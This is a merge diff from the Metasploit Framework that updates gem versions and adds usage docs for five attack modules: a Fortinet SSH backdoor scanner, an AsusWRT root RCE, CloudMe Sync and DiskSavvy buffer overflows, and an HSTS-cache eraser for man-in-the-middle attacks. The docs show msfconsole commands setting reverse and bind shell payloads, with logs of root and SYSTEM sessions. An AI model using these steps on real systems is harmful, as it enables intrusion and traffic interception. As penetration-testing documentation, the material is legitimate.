Merge branch 'master' into land-9607-

Author: busterb

Gemfile.lock

@@ -59,7 +59,7 @@ PATH
       rex-text
       rex-zip
       ruby-macho
-      ruby_smb
+      ruby_smb (= 0.0.18)
       rubyntlm
       rubyzip
       sqlite3
@@ -125,11 +125,11 @@ GEM
       railties (>= 3.0.0)
     faker (1.8.7)
       i18n (>= 0.7)
-    faraday (0.13.1)
+    faraday (0.14.0)
       multipart-post (>= 1.2, < 3)
     filesize (0.1.1)
     fivemat (1.3.5)
-    google-protobuf (3.5.1)
+    google-protobuf (3.5.1.2)
     googleapis-common-protos-types (1.0.1)
       google-protobuf (~> 3.0)
     googleauth (0.6.2)
@@ -140,12 +140,12 @@ GEM
       multi_json (~> 1.11)
       os (~> 0.9)
       signet (~> 0.7)
-    grpc (1.8.3)
+    grpc (1.9.1)
       google-protobuf (~> 3.1)
       googleapis-common-protos-types (~> 1.0.0)
       googleauth (>= 0.5.1, < 0.7)
     hashery (2.1.2)
-    i18n (0.9.1)
+    i18n (0.9.5)
       concurrent-ruby (~> 1.0)
     jsobfu (0.4.2)
       rkelly-remix
@@ -155,7 +155,7 @@ GEM
     logging (2.2.2)
       little-plugger (~> 1.1)
       multi_json (~> 1.10)
-    loofah (2.1.1)
+    loofah (2.2.0)
       crass (~> 1.0.2)
       nokogiri (>= 1.5.9)
     memoist (0.16.0)
@@ -167,7 +167,7 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-credential (2.0.12)
+    metasploit-credential (2.0.13)
       metasploit-concern
       metasploit-model
       metasploit_data_models
@@ -194,7 +194,7 @@ GEM
     metasploit_payloads-mettle (0.3.7)
     method_source (0.9.0)
     mini_portile2 (2.3.0)
-    minitest (5.11.1)
+    minitest (5.11.3)
     mqtt (0.5.0)
     msgpack (1.2.2)
     multi_json (1.13.1)
@@ -203,7 +203,7 @@ GEM
     net-ssh (4.2.0)
     network_interface (0.0.2)
     nexpose (7.2.0)
-    nokogiri (1.8.1)
+    nokogiri (1.8.2)
       mini_portile2 (~> 2.3.0)
     octokit (4.8.0)
       sawyer (~> 0.8.0, >= 0.5.3)
@@ -214,7 +214,7 @@ GEM
       pcaprub
     patch_finder (1.0.2)
     pcaprub (0.12.4)
-    pdf-reader (2.0.0)
+    pdf-reader (2.1.0)
       Ascii85 (~> 1.0.0)
       afm (~> 0.2.1)
       hashery (~> 2.0)
@@ -229,7 +229,7 @@ GEM
     pry (0.11.3)
       coderay (~> 1.1.0)
       method_source (~> 0.9.0)
-    public_suffix (3.0.1)
+    public_suffix (3.0.2)
     rack (1.6.8)
     rack-test (0.6.3)
       rack (>= 1.0)
@@ -320,7 +320,7 @@ GEM
       rspec-support (~> 3.7.0)
     rspec-rerun (1.1.0)
       rspec (~> 3.0)
-    rspec-support (3.7.0)
+    rspec-support (3.7.1)
     ruby-macho (1.1.0)
     ruby-rc4 (0.1.5)
     ruby_smb (0.0.18)
@@ -348,7 +348,7 @@ GEM
     thread_safe (0.3.6)
     timecop (0.9.1)
     ttfunk (1.5.1)
-    tzinfo (1.2.4)
+    tzinfo (1.2.5)
       thread_safe (~> 0.1)
     tzinfo-data (1.2018.3)
       tzinfo (>= 1.0.0)

documentation/modules/auxiliary/scanner/ssh/fortinet_backdoor.md

@@ -0,0 +1,63 @@
+## Intro
+
+This module scans for the Fortinet SSH backdoor and creates sessions.
+
+## Setup
+
+1. `git clone https://github.com/nixawk/labs`
+2. Import `FortiGate-Backdoor-VM/FortiGate-VM.ovf` into VMware
+3. <http://help.fortinet.com/fweb/580/Content/FortiWeb/fortiweb-admin/network_settings.htm>
+
+## Usage
+
+```
+msf5 > use auxiliary/scanner/ssh/fortinet_backdoor
+msf5 auxiliary(scanner/ssh/fortinet_backdoor) > set rhosts 192.168.212.0/24
+rhosts => 192.168.212.0/24
+msf5 auxiliary(scanner/ssh/fortinet_backdoor) > set threads 100
+threads => 100
+msf5 auxiliary(scanner/ssh/fortinet_backdoor) > run
+
+[*] Scanned  54 of 256 hosts (21% complete)
+[+] 192.168.212.128:22 - Logged in as Fortimanager_Access
+[*] Scanned  65 of 256 hosts (25% complete)
+[*] Scanned  78 of 256 hosts (30% complete)
+[*] Command shell session 1 opened (192.168.212.1:40605 -> 192.168.212.128:22) at 2018-02-21 21:35:11 -0600
+[*] Scanned 104 of 256 hosts (40% complete)
+[*] Scanned 141 of 256 hosts (55% complete)
+[*] Scanned 154 of 256 hosts (60% complete)
+[*] Scanned 180 of 256 hosts (70% complete)
+[*] Scanned 205 of 256 hosts (80% complete)
+[*] Scanned 240 of 256 hosts (93% complete)
+[*] Scanned 256 of 256 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/ssh/fortinet_backdoor) > sessions -1
+[*] Starting interaction with 1...
+
+FortiGate-VM # get system status
+Version: FortiGate-VM v5.0,build0228,130809 (GA Patch 4)
+Virus-DB: 16.00560(2012-10-19 08:31)
+Extended DB: 1.00000(2012-10-17 15:46)
+Extreme DB: 1.00000(2012-10-17 15:47)
+IPS-DB: 4.00345(2013-05-23 00:39)
+IPS-ETDB: 0.00000(2000-00-00 00:00)
+Serial-Number: FGVM00UNLICENSED
+Botnet DB: 1.00000(2012-05-28 22:51)
+License Status: Evaluation license expired
+Evaluation License Expires: Thu Jan 28 13:05:41 2016
+BIOS version: 04000002
+Log hard disk: Need format
+Hostname: FortiGate-VM
+Operation Mode: NAT
+Current virtual domain: root
+Max number of virtual domains: 10
+Virtual domains status: 1 in NAT mode, 0 in TP mode
+Virtual domain configuration: disable
+FIPS-CC mode: disable
+Current HA mode: standalone
+Branch point: 228
+Release Version Information: GA Patch 4
+System time: Wed Feb 21 13:13:43 2018
+
+FortiGate-VM #
+```

documentation/modules/exploit/linux/http/asuswrt_lan_rce.md

@@ -0,0 +1,70 @@
+## Description
+
+  This module exploits a vulnerability in AsusWRT to execute arbitrary commands as `root`.
+
+
+## Vulnerable Application
+
+  The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to perform a HTTP `POST` in certain cases. This can be combined with another vulnerability in the VPN configuration upload routine that sets NVRAM configuration variables directly from the `POST` request to enable a special command mode.
+
+  This command mode can then be abused by sending a UDP packet to the infosvr service, which is running on port UDP 9999 on the LAN interface, to launch the Telnet daemon on a random port and gain an interactive remote shell as the `root` user.
+
+  This module was tested successfully with a RT-AC68U running AsusWRT version 3.0.0.4.380.7743.
+
+  Numerous ASUS models are reportedly affected, but untested.
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. `use exploits/linux/http/asuswrt_lan_rce`
+  3. `set RHOST [IP]`
+  4. `run`
+  5. You should get a *root* session
+
+
+## Options
+
+  **ASUSWRTPORT**
+
+  AsusWRT HTTP portal port (default: `80`)
+
+
+## Scenarios
+msf > use exploit/linux/http/asuswrt_lan_rce
+msf exploit(linux/http/asuswrt_lan_rce) > set rhost 192.168.132.205
+rhost => 192.168.132.205
+msf exploit(linux/http/asuswrt_lan_rce) > run
+
+[+] 192.168.132.205:9999 - Successfully set the ateCommand_flag variable.
+[*] 192.168.132.205:9999 - Packet sent, let's sleep 10 seconds and try to connect to the router on port 51332
+[+] 192.168.132.205:9999 - Success, shell incoming!
+[*] Found shell.
+[*] Command shell session 1 opened (192.168.135.111:36597 -> 192.168.132.205:51332) at 2018-01-25 14:51:12 -0600
+
+id
+id
+/bin/sh: id: not found
+/ # cat /proc/cpuinfo
+cat /proc/cpuinfo
+system type             : Broadcom BCM53572 chip rev 1 pkg 8
+processor               : 0
+cpu model               : MIPS 74K V4.9
+BogoMIPS                : 149.91
+wait instruction        : no
+microsecond timers      : yes
+tlb_entries             : 32
+extra interrupt vector  : no
+hardware watchpoint     : yes
+ASEs implemented        : mips16 dsp
+shadow register sets    : 1
+VCED exceptions         : not available
+VCEI exceptions         : not available
+
+unaligned_instructions  : 0
+dcache hits             : 2147483648
+dcache misses           : 0
+icache hits             : 2147483648
+icache misses           : 0
+instructions            : 2147483648
+/ #

documentation/modules/exploit/windows/misc/cloudme_sync.md

@@ -0,0 +1,41 @@
+## Description
+This module exploits a buffer overflow vulnerability in [CloudMe Sync v1.10.9](https://www.cloudme.com/downloads/CloudMe_1109.exe).
+
+## Verification Steps
+  1. Install CloudMe for Desktop version `v1.10.9`
+  2. Start the applicaton (you don't need to create an account)
+  3. Start `msfconsole`
+  4. Do `use exploit/windows/misc/cloudme_sync`
+  5. Do `set RHOST ip`
+  6. Do `set LHOST ip`
+  7. Do `exploit`
+  8. Verify the Meterpreter session is opened
+
+## Scenarios
+
+### CloudMe Sync client application on Windows 7 SP1 x86
+
+```
+msf > use exploit/windows/misc/cloudme_sync 
+msf exploit(windows/misc/cloudme_sync) > set RHOST 172.16.40.148
+RHOST => 172.16.40.148
+msf exploit(windows/misc/cloudme_sync) > set PAYLOAD windows/meterpreter/reverse_tcp
+PAYLOAD => windows/meterpreter/reverse_tcp
+msf exploit(windows/misc/cloudme_sync) > set LHOST 172.16.40.5 
+LHOST => 172.16.40.5
+msf exploit(windows/misc/cloudme_sync) > exploit 
+
+[*] Started reverse TCP handler on 172.16.40.5:4444 
+[*] Sending stage (179779 bytes) to 172.16.40.148
+[*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.148:57185) at 2018-02-19 12:35:21 +0000
+
+meterpreter > sysinfo 
+Computer        : PC
+OS              : Windows 7 (Build 7601, Service Pack 1).
+Architecture    : x86
+System Language : pt_PT
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x86/windows
+meterpreter >
+```

documentation/modules/exploit/windows/misc/disk_savvy_adm.md

@@ -0,0 +1,39 @@
+## Vulnerable Application
+
+[DiskSavvy Enterprise](http://www.disksavvy.com/) version v10.4.18, affected by a stack-based buffer overflow vulnerability caused by improper bounds checking of the request sent to the built-in server which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target.. This module has been tested successfully on Windows 7 SP1 x86. The vulnerable application is available for download at [DiskSavvy Enterprise](http://www.disksavvy.com/setups/disksavvyent_setup_v10.4.18.exe).
+
+## Verification Steps
+  1. Install a vulnerable DiskSavvy Enterprise
+  2. Start `msfconsole`
+  3. Do `use exploit/windows/misc/disk_savvy_adm`
+  4. Do `set RHOST ip`
+  5. Do `set PAYLOAD windows/shell/bind_tcp`
+  6. Do `exploit`
+  7. Enjoy your shell
+
+## Scenarios
+
+### DiskSavvy Enterprise v10.4.18 on Windows 7 SP1 x86
+
+```
+msf > use exploit/windows/misc/disk_savvy_adm 
+msf exploit(windows/misc/disk_savvy_adm) > set RHOST 192.168.216.55
+RHOST => 192.168.216.55
+msf exploit(windows/misc/disk_savvy_adm) > set payload windows/shell/bind_tcp
+payload => windows/shell/bind_tcp
+msf exploit(windows/misc/disk_savvy_adm) > exploit 
+
+[*] Started bind handler
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 192.168.216.55
+[*] Command shell session 1 opened (192.168.216.5:36113 -> 192.168.216.55:4444) at 2018-02-14 15:19:02 -0500
+
+Microsoft Windows [Version 6.1.7601]
+Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
+
+C:\Windows\system32>whoami      
+whoami
+nt authority\system
+
+C:\Windows\system32>
+```

documentation/modules/post/multi/manage/hsts_eraser.md

@@ -0,0 +1,62 @@
+This module allows you to erase the [HTTP Strict-Transport-Security](https://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security) cache of a target machine.  When combined with a sniffer or a man-in-the-middle tool, this module will assist with the capture/modification of TLS-encrypted traffic.
+
+**WARNING:** This module _erases_ the HSTS cache, leaving the target in a vulnerable state.  All browser traffic from all users on the target will be subject to man-in-the-middle attacks.  There is no undo built-into this module.  If you intend to revert, you must first backup the HSTS file before running the module.
+
+Note: This module searches for all non-root users on the system.  It will not erase HSTS data for the root user.
+
+## Vulnerable Application
+
+The following platforms are supported:
+* Windows
+* Linux
+* OS X
+
+## Verification Steps
+
+1. Obtain and background a session from the target machine.
+2. From the `msf>` prompt, do ```use post/multi/manage/hsts_eraser```
+3. Set the ```DISCLAIMER``` option to ```True``` (after reading the above **WARNING**)
+4. Set the ```SESSION``` option
+5. ```run```
+
+Alternatively:
+
+1. Obtain a session from the target machine.
+2. From the `meterpreter>` prompt, do ```run post/multi/manage/hsts_eraser DISCLAIMER=True```
+
+## Demo
+
+Set up a Kali VM with some HSTS data:
+
+```bash
+root@kali-2017:~# adduser bob
+root@kali-2017:~# su bob
+bob@kali-2017:/root$ cd
+
+bob@kali-2017:~$ wget -S https://outlook.live.com/owa/ 2>&1 | grep -i strict
+  Strict-Transport-Security: max-age=31536000; includeSubDomains
+  Strict-Transport-Security: max-age=31536000; includeSubDomains
+bob@kali-2017:~$ cat .wget-hsts 
+# HSTS 1.0 Known Hosts database for GNU Wget.
+# Edit at your own risk.
+# <hostname>	<port>	<incl. subdomains>	<created>	<max-age>
+outlook.live.com	0	1	1519176414	31536000
+```
+
+Create an `msfvenom` payload, execute it, and then connect to it with `multi/exploit/handler`.  From the Meterpreter session on the victim:
+
+```
+[*] Meterpreter session 1 opened (127.0.0.1:38089 -> 127.0.0.1:44444) at 2018-02-20 19:19:02 -0600
+
+meterpreter > run post/multi/manage/hsts_eraser DISCLAIMER=True
+
+[*] Removing wget HSTS database for bob... 
+[*] HSTS databases removed! Now enjoy your favorite sniffer! ;-)
+```
+
+Confirm that the file was deleted:
+
+```bash
+bob@kali-2017:~$ cat .wget-hsts 
+cat: .wget-hsts: No such file or directory
+```